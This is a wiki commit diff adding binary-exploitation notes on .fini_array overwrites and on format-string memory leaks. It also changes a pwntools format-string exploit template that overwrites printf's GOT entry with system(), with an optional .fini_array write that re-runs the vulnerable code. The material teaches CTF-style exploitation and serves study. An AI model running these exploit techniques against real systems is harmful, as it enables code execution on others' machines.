GitBook: [master] 2 pages and 4 assets modified

exploiting/linux-exploiting-basic-esp/README.md

@@ -430,6 +430,42 @@ You an find a **template** to exploit the GOT using format-strings here:
 
 {% page-ref page="format-strings-template.md" %}
 
+### **.fini\_array**
+
+Essentially this is a structure with **functions that will be called** before the program finishes. This is interesting if you can call your **shellcode just jumping to an address**, or in cases where you need to go back to main again to **exploit the format string a second time**.
+
+```bash
+objdump -s -j .fini_array ./greeting
+
+./greeting:     file format elf32-i386
+
+Contents of section .fini_array:
+ 8049934 a0850408
+ 
+#Put your address in 0x8049934 
+```
+
+Note that this **won't** **create** an **eternal loop** because when you get back to main the canary will notice, the end of the stack might be corrupted and the function won't be recalled again. So with this you will be able to **have 1 more execution** of the vuln.
+
+### **Format Strings to Dump Content**
+
+A format string can also be abused to **dump content** from the memory of the program.  
+For example, in the following situation there is a **local variable in the stack pointing to a flag.** If you **find** where in **memory** the **pointer** to the **flag** is, you can make **printf access** that **address** and **print** the **flag**:
+
+So, flag is in **0xffffcf4c**
+
+![](../../.gitbook/assets/image%20%28618%29.png)
+
+And from the leak you can see the **pointer to the flag** is in the **8th** parameter:
+
+![](../../.gitbook/assets/image%20%28620%29.png)
+
+So, **accessing** the **8th parameter** you can get the flag:
+
+![](../../.gitbook/assets/image%20%28624%29.png)
+
+Note that following the **previous exploit** and realising that you can **leak content** you can **set pointers** to **`printf`** to the section where the **executable** is **loaded** and **dump** it **entirely**!
+
 ### **DTOR**
 
 {% hint style="danger" %}

exploiting/linux-exploiting-basic-esp/format-strings-template.md

@@ -23,6 +23,15 @@ REMOTE_BIN = "./tyler" #For ssh
 PREFIX_PAYLOAD = b"echo "
 SUFFIX_PAYLOAD = b""
 NNUM_ALREADY_WRITTEN_BYTES = 70
+MAX_LENTGH = 999999 #Big num if not restricted
+
+print(" ====================== ")
+print("Selected options:")
+print(f"PREFIX_PAYLOAD: {PREFIX_PAYLOAD}")
+print(f"SUFFIX_PAYLOAD: {SUFFIX_PAYLOAD}")
+print(f"NNUM_ALREADY_WRITTEN_BYTES: {NNUM_ALREADY_WRITTEN_BYTES}")
+print(" ====================== ")
+
 
 def connect_binary():
     global P, ELF_LOADED, ROP_LOADED
@@ -51,6 +60,7 @@ def connect_binary():
 def send_payload(payload):
     payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
     log.info("payload = %s" % repr(payload))
+    if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
     P.sendline(payload)
     sleep(0.5)
     return P.recv()
@@ -96,8 +106,17 @@ offset, padlen = get_formatstring_config()
 # Therefore, next time the printf function is executed, system will be executed instead with the same
 # parameters passed to printf
 
+# In some scenarios you will need to loop1 more time to the vulnerability
+# In that cases you need to overwrite a pointer in the .fini_array for example
+# Uncomment the commented code below to gain 1 rexecution extra
+
+#P_FINI_ARRAY = ELF_LOADED.symbols["__init_array_end"] # .fini_array address
+#INIT_LOOP_ADDR = 0x8048614 # Address to go back
 SYSTEM_PLT = ELF_LOADED.plt["system"]
 P_GOT = ELF_LOADED.got["printf"]
+
+#log.info(f"Init loop address: {hex(INIT_LOOP_ADDR)}")
+#log.info(f"fini.array address: {hex(P_FINI_ARRAY)}")
 log.info(f"System PLT address: {hex(SYSTEM_PLT)}")
 log.info(f"Printf GOT address: {hex(P_GOT)}")
 
@@ -105,9 +124,11 @@ if not P.connected(): connect_binary()
 if GDB and not REMOTETTCP and not REMOTESSH:
     # attach gdb and continue
     # You can set breakpoints, for example "break *main"
-    gdb.attach(P.pid, "b *main")
+    gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
+    sleep(5)
 
 format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES)
+#format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR)
 format_string.write(P_GOT, SYSTEM_PLT)
 format_string.execute_writes()